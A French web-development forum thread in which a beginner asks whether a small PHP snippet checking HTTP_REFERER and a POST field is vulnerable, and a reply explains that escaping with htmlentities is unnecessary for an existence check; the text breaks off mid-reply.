Aller au contenu

Y a t'il une faille là dedans?


Bourinho

Sujets conseillés

Bonjour à tous,

je voulais savoir s'il y avait une faille dans le script suivant :

$PagePrecOK=false;
if ((isset($_SERVER['HTTP_REFERER']))&&(isset($_POST['pseudo'])))
{
if ($_SERVER['HTTP_REFERER']==$MonDomaine.'inscription.php')
{
 $PagePrecOK=true;
}
}

Je ne m'y connais pas suffisamment pour répondre à ma question (sinon, je ne l'aurais pas posé ici... :D )

Je me disais avant que faire un isset sur une variable venant d'un formulaire ne devrait pas etre trop méchant... alors je me suis posais la question de l'utilité de mettre un htmlentities ici:

isset(htmlentities($_POST['pseudo']))

Vous me direz, "Ouais, mais de toute façon, t'as qu'à le mettre, ça coûte pas grand chose!!!" Je suis d'accord avec vous mais je n'ai pas trop envie de faire faire des opérations inutiles à mon futur serveur!!! (En plus, cela ne fonctionne pas, je vais y revenir...)

Pour ma part, je pense qu'il est nécessaire et alors là se pose un second problème: si $_POST['pseudo'] n'existe pas, htmlentities envoit un message d'erreur...

En résumé, le soucis, c'est que je voudrais faire un "htmlentities" avant un "isset" mais sans le "isset", je ne peux pas savoir si le "htmlentities" fonctionnera!!! :fou:

Vous me direz, t'as qu'à faire ta Regex si t'es pas content!!! :P C'est ce que je vais probablement faire si jamais je ne reçois pas de réponse satisfaisante... :blush:

Par avance, merci

Lien vers le commentaire
Partager sur d’autres sites

Salut :)

Pas besoin de faire des tests pour vérifier le contenu de ta variable puisque tu ne vérifie ici que son existence ;)

Plus tard dans ton script, bien sûr tu devras vérifier qu'elle répond à un format précis, puis l'échapper avant de l'insérer dans ta BDD, mais pour l'instant, pas besoin de htmlentities :rolleyes:

P.S: Tu peux simplifier ton script en enlevant certaines parenthèses redondantes:

$PagePrecOK=false;